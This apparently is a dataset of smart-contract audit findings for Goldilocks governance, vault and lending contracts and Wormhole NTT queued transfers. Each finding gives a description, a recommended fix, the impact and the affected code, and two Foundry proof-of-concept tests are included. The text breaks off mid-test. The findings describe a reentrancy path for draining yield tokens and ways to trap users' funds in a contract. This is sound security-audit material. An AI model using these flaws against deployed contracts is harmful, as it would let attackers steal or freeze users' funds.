Columns: name (string, 5-231 chars), severity (string, 3 classes), description (string, 107-68.2k chars), recommendation (string, 12-8.75k chars), impact (string, 3-11.2k chars), function (string, 15-64.6k chars)
`Goldigovernor._getProposalState()` shouldn't use `totalSupply`
medium
In `_getProposalState()`, the quorum check compares `proposal.forVotes` against the live `Goldiswap(goldiswap).totalSupply()`.\\n```\\n function _getProposalState(uint256 proposalId) internal view returns (ProposalState) {\\n Proposal storage proposal = proposals[proposalId];\\n if (proposal.cancelled) return ProposalState.Canceled;\\n else if (block.number <= proposal.startBlock) return ProposalState.Pending;\\n else if (block.number <= proposal.endBlock) return ProposalState.Active;\\n else if (proposal.eta == 0) return ProposalState.Succeeded;\\n else if (proposal.executed) return ProposalState.Executed;\\n else if (proposal.forVotes <= proposal.againstVotes || proposal.forVotes < Goldiswap(goldiswap).totalSupply() / 20) { //@audit shouldn't use totalSupply\\n return ProposalState.Defeated;\\n }\\n else if (block.timestamp >= proposal.eta + Timelock(timelock).GRACE_PERIOD()) {\\n return ProposalState.Expired;\\n }\\n else {\\n return ProposalState.Queued;\\n }\\n }\\n```\\n\\nBecause `totalSupply` increases in real time, a `Queued` proposal can unexpectedly become `Defeated` once the growing supply pushes the 5% quorum above `forVotes`.
Rather than reading the live `totalSupply`, the quorum should be snapshotted, e.g., by caching `totalSupply() / 20` at proposal creation and comparing `forVotes` against that fixed value.
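A minimal sketch of one such mechanism, assuming a new `quorumVotes` field is added to the `Proposal` struct (field placement and names are illustrative, not part of the existing code):\\n```\\nstruct Proposal {\\n // ... existing fields ...\\n uint256 quorumVotes; // quorum snapshotted at proposal creation\\n}\\n\\n// in propose():\\nnewProposal.quorumVotes = Goldiswap(goldiswap).totalSupply() / 20;\\n\\n// in _getProposalState():\\nelse if (proposal.forVotes <= proposal.againstVotes || proposal.forVotes < proposal.quorumVotes) {\\n return ProposalState.Defeated;\\n}\\n```\\n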
A proposal state might be changed unexpectedly.
```\\n function _getProposalState(uint256 proposalId) internal view returns (ProposalState) {\\n Proposal storage proposal = proposals[proposalId];\\n if (proposal.cancelled) return ProposalState.Canceled;\\n else if (block.number <= proposal.startBlock) return ProposalState.Pending;\\n else if (block.number <= proposal.endBlock) return ProposalState.Active;\\n else if (proposal.eta == 0) return ProposalState.Succeeded;\\n else if (proposal.executed) return ProposalState.Executed;\\n else if (proposal.forVotes <= proposal.againstVotes || proposal.forVotes < Goldiswap(goldiswap).totalSupply() / 20) { //@audit shouldn't use totalSupply\\n return ProposalState.Defeated;\\n }\\n else if (block.timestamp >= proposal.eta + Timelock(timelock).GRACE_PERIOD()) {\\n return ProposalState.Expired;\\n }\\n else {\\n return ProposalState.Queued;\\n }\\n }\\n```\\n
In `Goldivault.redeemYield()`, users can redeem more yield tokens using reentrancy
medium
`Goldivault.redeemYield()` is vulnerable to reentrancy if any yield token hands control to the recipient during transfer (e.g., via an ERC777-style `beforeTokenTransfer` hook).\\nLet's assume `yt.totalSupply` = 100, `yieldToken.balance` = 100, and the user holds 20 yt.\\nThe user calls `redeemYield()` with 10 yt.\\n`yt.totalSupply` drops to 90 and the contract transfers `100 * 10 / 100 = 10` yieldToken to the user.\\nInside the transfer hook, the user re-enters `redeemYield()` with another 10 yt.\\nAs `yieldToken.balance` is still 100, he receives `100 * 10 / 90 = 11` yieldToken.\\n```\\n function redeemYield(uint256 amount) external {\\n if(amount == 0) revert InvalidRedemption();\\n if(block.timestamp < concludeTime + delay || !concluded) revert NotConcluded();\\n uint256 yieldShare = FixedPointMathLib.divWad(amount, ERC20(yt).totalSupply());\\n YieldToken(yt).burnYT(msg.sender, amount);\\n uint256 yieldTokensLength = yieldTokens.length;\\n for(uint8 i; i < yieldTokensLength; ++i) {\\n uint256 finalYield;\\n if(yieldTokens[i] == depositToken) {\\n finalYield = ERC20(yieldTokens[i]).balanceOf(address(this)) - depositTokenAmount;\\n }\\n else {\\n finalYield = ERC20(yieldTokens[i]).balanceOf(address(this));\\n }\\n uint256 claimable = FixedPointMathLib.mulWad(finalYield, yieldShare);\\n SafeTransferLib.safeTransfer(yieldTokens[i], msg.sender, claimable);\\n }\\n emit YieldTokenRedemption(msg.sender, amount);\\n }\\n```\\n
We should add a `nonReentrant` modifier to `redeemYield()`.
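A minimal sketch, assuming the vault inherits a standard reentrancy guard (e.g., Solmate's `ReentrancyGuard`; the import path and inheritance are illustrative); only the function signature changes:\\n```\\nimport {ReentrancyGuard} from "solmate/utils/ReentrancyGuard.sol";\\n\\ncontract Goldivault is ReentrancyGuard {\\n function redeemYield(uint256 amount) external nonReentrant {\\n // ... existing logic unchanged ...\\n }\\n}\\n```\\n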
Malicious users can steal `yieldToken` using `redeemYield()`.
```\\n function redeemYield(uint256 amount) external {\\n if(amount == 0) revert InvalidRedemption();\\n if(block.timestamp < concludeTime + delay || !concluded) revert NotConcluded();\\n uint256 yieldShare = FixedPointMathLib.divWad(amount, ERC20(yt).totalSupply());\\n YieldToken(yt).burnYT(msg.sender, amount);\\n uint256 yieldTokensLength = yieldTokens.length;\\n for(uint8 i; i < yieldTokensLength; ++i) {\\n uint256 finalYield;\\n if(yieldTokens[i] == depositToken) {\\n finalYield = ERC20(yieldTokens[i]).balanceOf(address(this)) - depositTokenAmount;\\n }\\n else {\\n finalYield = ERC20(yieldTokens[i]).balanceOf(address(this));\\n }\\n uint256 claimable = FixedPointMathLib.mulWad(finalYield, yieldShare);\\n SafeTransferLib.safeTransfer(yieldTokens[i], msg.sender, claimable);\\n }\\n emit YieldTokenRedemption(msg.sender, amount);\\n }\\n```\\n
Wrong validation in `Goldigovernor.cancel()`
medium
In `Goldigovernor.cancel()`, the caller must be the proposer and the proposer must hold no more votes than `proposalThreshold`, meaning a proposer whose voting power exceeds the threshold cannot cancel their own proposal.\\n```\\n function cancel(uint256 proposalId) external {\\n if(_getProposalState(proposalId) == ProposalState.Executed) revert InvalidProposalState();\\n Proposal storage proposal = proposals[proposalId];\\n if(msg.sender != proposal.proposer) revert NotProposer();\\n if(GovLocks(govlocks).getPriorVotes(proposal.proposer, block.number - 1) > proposalThreshold) revert AboveThreshold(); //@audit incorrect\\n proposal.cancelled = true;\\n uint256 targetsLength = proposal.targets.length;\\n for (uint256 i = 0; i < targetsLength; i++) {\\n Timelock(timelock).cancelTransaction(proposal.targets[i], proposal.eta, proposal.values[i], proposal.calldatas[i], proposal.signatures[i]);\\n }\\n emit ProposalCanceled(proposalId);\\n }\\n```\\n
It should be modified as follows (GovernorBravo-style semantics: the proposer can always cancel, while anyone else can cancel only once the proposer's voting power has fallen to the threshold or below).\\n```\\nif(msg.sender != proposal.proposer && GovLocks(govlocks).getPriorVotes(proposal.proposer, block.number - 1) > proposalThreshold) revert Error;\\n```\\n
A proposer can't cancel his proposal unless he decreases his voting power.
```\\n function cancel(uint256 proposalId) external {\\n if(_getProposalState(proposalId) == ProposalState.Executed) revert InvalidProposalState();\\n Proposal storage proposal = proposals[proposalId];\\n if(msg.sender != proposal.proposer) revert NotProposer();\\n if(GovLocks(govlocks).getPriorVotes(proposal.proposer, block.number - 1) > proposalThreshold) revert AboveThreshold(); //@audit incorrect\\n proposal.cancelled = true;\\n uint256 targetsLength = proposal.targets.length;\\n for (uint256 i = 0; i < targetsLength; i++) {\\n Timelock(timelock).cancelTransaction(proposal.targets[i], proposal.eta, proposal.values[i], proposal.calldatas[i], proposal.signatures[i]);\\n }\\n emit ProposalCanceled(proposalId);\\n }\\n```\\n
Users can't cancel their proposals after `proposalThreshold` is increased
medium
When users call `cancel()`, it validates the proposer's voting power against the current `proposalThreshold`, which can be changed at any time using `setProposalThreshold()`.\\n```\\n function setProposalThreshold(uint256 newProposalThreshold) external {\\n if(msg.sender != multisig) revert NotMultisig();\\n if(newProposalThreshold < MIN_PROPOSAL_THRESHOLD || newProposalThreshold > MAX_PROPOSAL_THRESHOLD) revert InvalidVotingParameter();\\n uint256 oldProposalThreshold = proposalThreshold;\\n proposalThreshold = newProposalThreshold;\\n emit ProposalThresholdSet(oldProposalThreshold, proposalThreshold);\\n }\\n```\\n\\nHere is a possible scenario.\\nLet's assume `proposalThreshold` = 100 and a user has 100 voting power.\\nThe user creates a proposal using `propose()`.\\nAfter that, `proposalThreshold` is increased to 150 by the `multisig`.\\nWhen the user calls `cancel()`, it reverts as he no longer satisfies the threshold check.
Cache `proposalThreshold` in the proposal's state at creation time and validate `cancel()` against that cached value.
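A minimal sketch, assuming a `proposalThreshold` field is added to the `Proposal` struct (names illustrative):\\n```\\nstruct Proposal {\\n // ... existing fields ...\\n uint256 proposalThreshold; // threshold snapshotted at proposal creation\\n}\\n\\n// in propose():\\nnewProposal.proposalThreshold = proposalThreshold;\\n\\n// in cancel(), compare against the snapshotted value rather than the current one:\\nif (GovLocks(govlocks).getPriorVotes(proposal.proposer, block.number - 1) > proposal.proposalThreshold) revert AboveThreshold();\\n```\\n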
Users can't cancel their proposals after `proposalThreshold` is increased.
```\\n function setProposalThreshold(uint256 newProposalThreshold) external {\\n if(msg.sender != multisig) revert NotMultisig();\\n if(newProposalThreshold < MIN_PROPOSAL_THRESHOLD || newProposalThreshold > MAX_PROPOSAL_THRESHOLD) revert InvalidVotingParameter();\\n uint256 oldProposalThreshold = proposalThreshold;\\n proposalThreshold = newProposalThreshold;\\n emit ProposalThresholdSet(oldProposalThreshold, proposalThreshold);\\n }\\n```\\n
`Goldilend.liquidate()` might revert due to underflow
medium
In `repay()`, the `interest` calculation is subject to rounding.\\n```\\n function repay(uint256 repayAmount, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(userLoan.borrowedAmount < repayAmount) revert ExcessiveRepay();\\n if(block.timestamp > userLoan.endDate) revert LoanExpired();\\n uint256 interestLoanRatio = FixedPointMathLib.divWad(userLoan.interest, userLoan.borrowedAmount);\\nL425 uint256 interest = FixedPointMathLib.mulWadUp(repayAmount, interestLoanRatio); //@audit rounding issue\\n outstandingDebt -= repayAmount - interest > outstandingDebt ? outstandingDebt : repayAmount - interest;\\n // rest of code\\n }\\n// rest of code\\n function liquidate(address user, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(block.timestamp < userLoan.endDate || userLoan.liquidated || userLoan.borrowedAmount == 0) revert Unliquidatable();\\n loans[user][_userLoanId].liquidated = true;\\n loans[user][_userLoanId].borrowedAmount = 0;\\nL448 outstandingDebt -= userLoan.borrowedAmount - userLoan.interest;\\n // rest of code\\n }\\n```\\n\\nHere is a possible scenario.\\nThere are 2 borrowers, each with `borrowedAmount = 100` and `interest = 10`, so `outstandingDebt = 2 * (100 - 10) = 180`.\\nThe first borrower calls `repay()` with `repayAmount = 100`.\\nDue to the rounding issue at L425, `interest` is 9 instead of 10, and `outstandingDebt = 180 - (100 - 9) = 89`.\\nIn `liquidate()` for the second borrower, the subtraction at L448 reverts because `outstandingDebt` (89) is less than `borrowedAmount - interest` (90).
In `liquidate()`, `outstandingDebt` should be updated like the below.\\n```\\n /// @inheritdoc IGoldilend\\n function liquidate(address user, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(block.timestamp < userLoan.endDate || userLoan.liquidated || userLoan.borrowedAmount == 0) revert Unliquidatable();\\n loans[user][_userLoanId].liquidated = true;\\n loans[user][_userLoanId].borrowedAmount = 0;\\n// Add the line below\\n uint256 debtToRepay = userLoan.borrowedAmount - userLoan.interest;\\n// Add the line below\\n outstandingDebt -= debtToRepay > outstandingDebt ? outstandingDebt : debtToRepay;\\n // rest of code\\n }\\n```\\n
`liquidate()` might revert due to underflow.
```\\n function repay(uint256 repayAmount, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(userLoan.borrowedAmount < repayAmount) revert ExcessiveRepay();\\n if(block.timestamp > userLoan.endDate) revert LoanExpired();\\n uint256 interestLoanRatio = FixedPointMathLib.divWad(userLoan.interest, userLoan.borrowedAmount);\\nL425 uint256 interest = FixedPointMathLib.mulWadUp(repayAmount, interestLoanRatio); //@audit rounding issue\\n outstandingDebt -= repayAmount - interest > outstandingDebt ? outstandingDebt : repayAmount - interest;\\n // rest of code\\n }\\n// rest of code\\n function liquidate(address user, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(block.timestamp < userLoan.endDate || userLoan.liquidated || userLoan.borrowedAmount == 0) revert Unliquidatable();\\n loans[user][_userLoanId].liquidated = true;\\n loans[user][_userLoanId].borrowedAmount = 0;\\nL448 outstandingDebt -= userLoan.borrowedAmount - userLoan.interest;\\n // rest of code\\n }\\n```\\n
In `Goldigovernor`, wrong assumption of block time
medium
In `Goldigovernor.sol`, voting period/delay limits are set assuming a 15s block time.\\n```\\n /// @notice Minimum voting period\\n uint32 public constant MIN_VOTING_PERIOD = 5760; // About 24 hours\\n\\n /// @notice Maximum voting period\\n uint32 public constant MAX_VOTING_PERIOD = 80640; // About 2 weeks\\n\\n /// @notice Minimum voting delay\\n uint32 public constant MIN_VOTING_DELAY = 1;\\n\\n /// @notice Maximum voting delay\\n uint32 public constant MAX_VOTING_DELAY = 40320; // About 1 week\\n```\\n\\nBut Berachain has a 5s block time according to its documentation.\\n```\\nBerachain has the following properties:\\n\\n- Block time: 5s\\n```\\n\\nSo these limits correspond to durations three times shorter than intended; e.g., `MIN_VOTING_PERIOD` = 5760 blocks is only about 8 hours at 5s per block, not 24 hours.
These limits should be recalculated using the 5s block time.
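For example, the same intended durations expressed in 5s blocks:\\n```\\n /// @notice Minimum voting period\\n uint32 public constant MIN_VOTING_PERIOD = 17280; // 86400s / 5s, about 24 hours\\n\\n /// @notice Maximum voting period\\n uint32 public constant MAX_VOTING_PERIOD = 241920; // 1209600s / 5s, about 2 weeks\\n\\n /// @notice Minimum voting delay\\n uint32 public constant MIN_VOTING_DELAY = 1;\\n\\n /// @notice Maximum voting delay\\n uint32 public constant MAX_VOTING_DELAY = 120960; // 604800s / 5s, about 1 week\\n```\\n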
Voting period/delay limits will be set shorter than expected.
```\\n /// @notice Minimum voting period\\n uint32 public constant MIN_VOTING_PERIOD = 5760; // About 24 hours\\n\\n /// @notice Maximum voting period\\n uint32 public constant MAX_VOTING_PERIOD = 80640; // About 2 weeks\\n\\n /// @notice Minimum voting delay\\n uint32 public constant MIN_VOTING_DELAY = 1;\\n\\n /// @notice Maximum voting delay\\n uint32 public constant MAX_VOTING_DELAY = 40320; // About 1 week\\n```\\n
Queued transfers can become stuck on the source chain if Transceiver instructions are encoded in the incorrect order
high
In the case of multiple Transceivers, the current logic expects that a sender encodes Transceiver instructions in order of increasing Transceiver registration index, as validated in `TransceiverStructs::parseTransceiverInstructions`. Under normal circumstances, this logic works as expected, and the transaction fails when the user packs transceiver instructions in the incorrect order.\\n```\\n/* snip */\\nfor (uint256 i = 0; i < instructionsLength; i++) {\\n TransceiverInstruction memory instruction;\\n (instruction, offset) = parseTransceiverInstructionUnchecked(encoded, offset);\\n\\n uint8 instructionIndex = instruction.index;\\n\\n // The instructions passed in have to be strictly increasing in terms of transceiver index\\n if (i != 0 && instructionIndex <= lastIndex) {\\n revert UnorderedInstructions();\\n }\\n lastIndex = instructionIndex;\\n\\n instructions[instructionIndex] = instruction;\\n}\\n/* snip */\\n```\\n\\nHowever, this requirement on the order of Transceiver indices is not checked when transfers are initially queued for delayed execution. As a result, a transaction where this is the case will fail when the user calls `NttManager::completeOutboundQueuedTransfer` to execute a queued transfer.
When the transfer amount exceeds the current outbound capacity, verify the Transceiver instructions are ordered correctly before adding a message to the list of queued transfers.
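A hedged sketch of this validation in `NttManager::_transferEntryPoint` (the accessor for the enabled-transceiver count is an assumption; exact storage helpers may differ):\\n```\\nif (shouldQueue && isAmountRateLimited) {\\n // parse the instructions up front purely for validation; this reverts with\\n // UnorderedInstructions() on badly ordered input, failing fast instead of\\n // leaving an unexecutable transfer in the queue\\n TransceiverStructs.parseTransceiverInstructions(\\n transceiverInstructions, _getNumTransceiversStorage().enabled\\n );\\n\\n // ... existing queueing logic ...\\n}\\n```\\n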
The sender's funds are transferred to the NTT Manager when messages are queued. However, this queued message can never be executed if the Transceiver indices are incorrectly ordered and, as a result, the user funds remain stuck in the NTT Manager.\\nProof of Concept: Run the following test:\\n```\\ncontract TestWrongTransceiverOrder is Test, INttManagerEvents, IRateLimiterEvents {\\n NttManager nttManagerChain1;\\n NttManager nttManagerChain2;\\n\\n using TrimmedAmountLib for uint256;\\n using TrimmedAmountLib for TrimmedAmount;\\n\\n uint16 constant chainId1 = 7;\\n uint16 constant chainId2 = 100;\\n uint8 constant FAST_CONSISTENCY_LEVEL = 200;\\n uint256 constant GAS_LIMIT = 500000;\\n\\n uint16 constant SENDING_CHAIN_ID = 1;\\n uint256 constant DEVNET_GUARDIAN_PK =\\n 0xcfb12303a19cde580bb4dd771639b0d26bc68353645571a8cff516ab2ee113a0;\\n WormholeSimulator guardian;\\n uint256 initialBlockTimestamp;\\n\\n WormholeTransceiver wormholeTransceiverChain1;\\n WormholeTransceiver wormholeTransceiver2Chain1;\\n\\n WormholeTransceiver wormholeTransceiverChain2;\\n address userA = address(0x123);\\n address userB = address(0x456);\\n address userC = address(0x789);\\n address userD = address(0xABC);\\n\\n address relayer = address(0x28D8F1Be96f97C1387e94A53e00eCcFb4E75175a);\\n IWormhole wormhole = IWormhole(0x706abc4E45D419950511e474C7B9Ed348A4a716c);\\n\\n function setUp() public {\\n string memory url = "https://goerli.blockpi.network/v1/rpc/public";\\n vm.createSelectFork(url);\\n initialBlockTimestamp = vm.getBlockTimestamp();\\n\\n guardian = new WormholeSimulator(address(wormhole), DEVNET_GUARDIAN_PK);\\n\\n vm.chainId(chainId1);\\n DummyToken t1 = new DummyToken();\\n NttManager implementation =\\n new MockNttManagerContract(address(t1), INttManager.Mode.LOCKING, chainId1, 1 days);\\n\\n nttManagerChain1 =\\n MockNttManagerContract(address(new ERC1967Proxy(address(implementation), "")));\\n nttManagerChain1.initialize();\\n\\n WormholeTransceiver wormholeTransceiverChain1Implementation = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiverChain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation), ""))\\n );\\n\\n WormholeTransceiver wormholeTransceiverChain1Implementation2 = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiver2Chain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation2), ""))\\n );\\n\\n\\n // Actually initialize properly now\\n wormholeTransceiverChain1.initialize();\\n wormholeTransceiver2Chain1.initialize();\\n\\n\\n nttManagerChain1.setTransceiver(address(wormholeTransceiverChain1));\\n nttManagerChain1.setTransceiver(address(wormholeTransceiver2Chain1));\\n nttManagerChain1.setOutboundLimit(type(uint64).max);\\n nttManagerChain1.setInboundLimit(type(uint64).max, chainId2);\\n\\n // Chain 2 setup\\n vm.chainId(chainId2);\\n DummyToken t2 = new DummyTokenMintAndBurn();\\n NttManager implementationChain2 =\\n new MockNttManagerContract(address(t2), INttManager.Mode.BURNING, chainId2, 1 days);\\n\\n nttManagerChain2 =\\n MockNttManagerContract(address(new ERC1967Proxy(address(implementationChain2), "")));\\n nttManagerChain2.initialize();\\n\\n WormholeTransceiver 
wormholeTransceiverChain2Implementation = new MockWormholeTransceiverContract(\\n address(nttManagerChain2),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n\\n wormholeTransceiverChain2 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain2Implementation), ""))\\n );\\n wormholeTransceiverChain2.initialize();\\n\\n nttManagerChain2.setTransceiver(address(wormholeTransceiverChain2));\\n nttManagerChain2.setOutboundLimit(type(uint64).max);\\n nttManagerChain2.setInboundLimit(type(uint64).max, chainId1);\\n\\n // Register peer contracts for the nttManager and transceiver. Transceivers and nttManager each have the concept of peers here.\\n nttManagerChain1.setPeer(chainId2, bytes32(uint256(uint160(address(nttManagerChain2)))), 9);\\n nttManagerChain2.setPeer(chainId1, bytes32(uint256(uint160(address(nttManagerChain1)))), 7);\\n\\n // Set peers for the transceivers\\n wormholeTransceiverChain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n wormholeTransceiver2Chain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n wormholeTransceiverChain2.setWormholePeer(\\n chainId1, bytes32(uint256(uint160(address(wormholeTransceiverChain1))))\\n );\\n\\n require(nttManagerChain1.getThreshold() != 0, "Threshold is zero with active transceivers");\\n\\n // Actually set it\\n nttManagerChain1.setThreshold(2);\\n nttManagerChain2.setThreshold(1);\\n }\\n\\n function testWrongTransceiverOrder() external {\\n vm.chainId(chainId1);\\n\\n // Setting up the transfer\\n DummyToken token1 = DummyToken(nttManagerChain1.token());\\n uint8 decimals = token1.decimals();\\n\\n token1.mintDummy(address(userA), 5 * 10 ** decimals);\\n uint256 outboundLimit = 4 * 10 ** decimals;\\n nttManagerChain1.setOutboundLimit(outboundLimit);\\n\\n vm.startPrank(userA);\\n\\n uint256 transferAmount = 5 * 10 ** decimals;\\n token1.approve(address(nttManagerChain1), transferAmount);\\n\\n // transfer with shouldQueue == true\\n uint64 qSeq = nttManagerChain1.transfer(\\n transferAmount, chainId2, toWormholeFormat(userB), true, encodeTransceiverInstructionsJumbled(true)\\n );\\n\\n assertEq(qSeq, 0);\\n IRateLimiter.OutboundQueuedTransfer memory qt = nttManagerChain1.getOutboundQueuedTransfer(0);\\n assertEq(qt.amount.getAmount(), transferAmount.trim(decimals, decimals).getAmount());\\n assertEq(qt.recipientChain, chainId2);\\n assertEq(qt.recipient, toWormholeFormat(userB));\\n assertEq(qt.txTimestamp, initialBlockTimestamp);\\n\\n // assert that the contract also locked funds from the user\\n assertEq(token1.balanceOf(address(userA)), 0);\\n assertEq(token1.balanceOf(address(nttManagerChain1)), transferAmount);\\n\\n // elapse rate limit duration - 1\\n uint256 durationElapsedTime = initialBlockTimestamp + nttManagerChain1.rateLimitDuration();\\n\\n vm.warp(durationElapsedTime);\\n\\n vm.expectRevert(0x71f23ef2); //UnorderedInstructions() selector\\n nttManagerChain1.completeOutboundQueuedTransfer(0);\\n }\\n\\n // Encode an instruction for each of the relayers\\n function encodeTransceiverInstructionsJumbled(bool relayer_off) public view returns (bytes memory) {\\n WormholeTransceiver.WormholeTransceiverInstruction memory instruction =\\n IWormholeTransceiver.WormholeTransceiverInstruction(relayer_off);\\n\\n bytes memory encodedInstructionWormhole =\\n 
wormholeTransceiverChain1.encodeWormholeTransceiverInstruction(instruction);\\n\\n TransceiverStructs.TransceiverInstruction memory TransceiverInstruction1 =\\n TransceiverStructs.TransceiverInstruction({index: 0, payload: encodedInstructionWormhole});\\n TransceiverStructs.TransceiverInstruction memory TransceiverInstruction2 =\\n TransceiverStructs.TransceiverInstruction({index: 1, payload: encodedInstructionWormhole});\\n\\n TransceiverStructs.TransceiverInstruction[] memory TransceiverInstructions =\\n new TransceiverStructs.TransceiverInstruction[](2);\\n\\n TransceiverInstructions[0] = TransceiverInstruction2;\\n TransceiverInstructions[1] = TransceiverInstruction1;\\n\\n return TransceiverStructs.encodeTransceiverInstructions(TransceiverInstructions);\\n }\\n}\\n```\\n
```\\n/* snip */\\nfor (uint256 i = 0; i < instructionsLength; i++) {\\n TransceiverInstruction memory instruction;\\n (instruction, offset) = parseTransceiverInstructionUnchecked(encoded, offset);\\n\\n uint8 instructionIndex = instruction.index;\\n\\n // The instructions passed in have to be strictly increasing in terms of transceiver index\\n if (i != 0 && instructionIndex <= lastIndex) {\\n revert UnorderedInstructions();\\n }\\n lastIndex = instructionIndex;\\n\\n instructions[instructionIndex] = instruction;\\n}\\n/* snip */\\n```\\n
Queued transfers can become stuck on the source chain if new Transceivers are added or existing Transceivers are modified before completion
high
When a sender transfers an amount that exceeds the current outbound capacity, such transfers are sent to a queue for delayed execution within `NttManager::_transferEntrypoint`. The rate limit duration is defined as an immutable variable determining the temporal lag between queueing and execution, with a typical rate limit duration being 24 hours.\\n```\\n/* snip */\\n// now check rate limits\\nbool isAmountRateLimited = _isOutboundAmountRateLimited(internalAmount);\\nif (!shouldQueue && isAmountRateLimited) {\\n revert NotEnoughCapacity(getCurrentOutboundCapacity(), amount);\\n}\\nif (shouldQueue && isAmountRateLimited) {\\n // emit an event to notify the user that the transfer is rate limited\\n emit OutboundTransferRateLimited(\\n msg.sender, sequence, amount, getCurrentOutboundCapacity()\\n );\\n\\n // queue up and return\\n _enqueueOutboundTransfer(\\n sequence,\\n trimmedAmount,\\n recipientChain,\\n recipient,\\n msg.sender,\\n transceiverInstructions\\n );\\n\\n // refund price quote back to sender\\n _refundToSender(msg.value);\\n\\n // return the sequence in the queue\\n return sequence;\\n}\\n/* snip */\\n```\\n\\nIn the event that new Transceivers are added or existing Transceivers are removed from the NTT Manager, any pending queued transfers within the rate limit duration can potentially revert. This is because senders might not have correctly packed the Transceiver instructions for a given Transceiver based on the new configuration, and a missing Transceiver instruction can potentially cause an array index out-of-bounds exception while calculating the delivery price when the instructions are finally parsed. For example, if there are initially two Transceivers but an additional Transceiver is added while the transfer is rate-limited, the instructions array as shown below will be declared with a length of three, corresponding to the new number of enabled Transceivers; however, the transfer will have only encoded two Transceiver instructions based on the configuration at the time it was initiated.\\n```\\nfunction parseTransceiverInstructions(\\n bytes memory encoded,\\n uint256 numEnabledTransceivers\\n) public pure returns (TransceiverInstruction[] memory) {\\n uint256 offset = 0;\\n uint256 instructionsLength;\\n (instructionsLength, offset) = encoded.asUint8Unchecked(offset);\\n\\n // We allocate an array with the length of the number of enabled transceivers\\n // This gives us the flexibility to not have to pass instructions for transceivers that\\n // don't need them\\n TransceiverInstruction[] memory instructions =\\n new TransceiverInstruction[](numEnabledTransceivers);\\n\\n uint256 lastIndex = 0;\\n for (uint256 i = 0; i < instructionsLength; i++) {\\n TransceiverInstruction memory instruction;\\n (instruction, offset) = parseTransceiverInstructionUnchecked(encoded, offset);\\n\\n uint8 instructionIndex = instruction.index;\\n\\n // The instructions passed in have to be strictly increasing in terms of transceiver index\\n if (i != 0 && instructionIndex <= lastIndex) {\\n revert UnorderedInstructions();\\n }\\n lastIndex = instructionIndex;\\n\\n instructions[instructionIndex] = instruction;\\n }\\n\\n encoded.checkLength(offset);\\n\\n return instructions;\\n}\\n```\\n
Consider treating any enabled Transceiver whose registration index has no corresponding encoded instruction as having an empty (default) instruction when estimating the delivery price, rather than indexing into the instructions array unconditionally.
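A hedged sketch of such a defensive lookup during delivery price estimation (the loop structure and variable names are illustrative, not the actual NTT internals):\\n```\\nfor (uint256 i = 0; i < enabledTransceivers.length; i++) {\\n uint8 registeredIndex = transceiverInfos[enabledTransceivers[i]].index;\\n\\n // fall back to an empty instruction if the queued transfer predates the\\n // current transceiver configuration and did not encode this index\\n TransceiverStructs.TransceiverInstruction memory instruction;\\n if (registeredIndex < instructions.length) {\\n instruction = instructions[registeredIndex];\\n } // otherwise `instruction` keeps its zero-value default (no payload)\\n\\n // ... quote this transceiver's delivery price using `instruction` ...\\n}\\n```\\n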
Missing Transceiver instructions prevents the total delivery price for the corresponding message from being calculated. This prevents any queued Transfers from being executed with the current list of transceivers. As a result, underlying sender funds will be stuck in the `NttManager` contract. Note that a similar issue occurs if the peer NTT manager contract is updated on the destination (say, after a redeployment on the source chain) before an in-flight attestation is received and executed, reverting with an invalid peer error.\\nProof of Concept: Run the following test:\\n```\\ncontract TestTransceiverModification is Test, INttManagerEvents, IRateLimiterEvents {\\n NttManager nttManagerChain1;\\n NttManager nttManagerChain2;\\n\\n using TrimmedAmountLib for uint256;\\n using TrimmedAmountLib for TrimmedAmount;\\n\\n uint16 constant chainId1 = 7;\\n uint16 constant chainId2 = 100;\\n uint8 constant FAST_CONSISTENCY_LEVEL = 200;\\n uint256 constant GAS_LIMIT = 500000;\\n\\n uint16 constant SENDING_CHAIN_ID = 1;\\n uint256 constant DEVNET_GUARDIAN_PK =\\n 0xcfb12303a19cde580bb4dd771639b0d26bc68353645571a8cff516ab2ee113a0;\\n WormholeSimulator guardian;\\n uint256 initialBlockTimestamp;\\n\\n WormholeTransceiver wormholeTransceiverChain1;\\n WormholeTransceiver wormholeTransceiver2Chain1;\\n WormholeTransceiver wormholeTransceiver3Chain1;\\n\\n WormholeTransceiver wormholeTransceiverChain2;\\n address userA = address(0x123);\\n address userB = address(0x456);\\n address userC = address(0x789);\\n address userD = address(0xABC);\\n\\n address relayer = address(0x28D8F1Be96f97C1387e94A53e00eCcFb4E75175a);\\n IWormhole wormhole = IWormhole(0x706abc4E45D419950511e474C7B9Ed348A4a716c);\\n\\n function setUp() public {\\n string memory url = "https://goerli.blockpi.network/v1/rpc/public";\\n vm.createSelectFork(url);\\n initialBlockTimestamp = vm.getBlockTimestamp();\\n\\n guardian = new WormholeSimulator(address(wormhole), DEVNET_GUARDIAN_PK);\\n\\n vm.chainId(chainId1);\\n DummyToken t1 = new DummyToken();\\n NttManager implementation =\\n new MockNttManagerContract(address(t1), INttManager.Mode.LOCKING, chainId1, 1 days);\\n\\n nttManagerChain1 =\\n MockNttManagerContract(address(new ERC1967Proxy(address(implementation), "")));\\n nttManagerChain1.initialize();\\n\\n // transceiver 1\\n WormholeTransceiver wormholeTransceiverChain1Implementation = new MockWormholeTransceiverContract(\\n 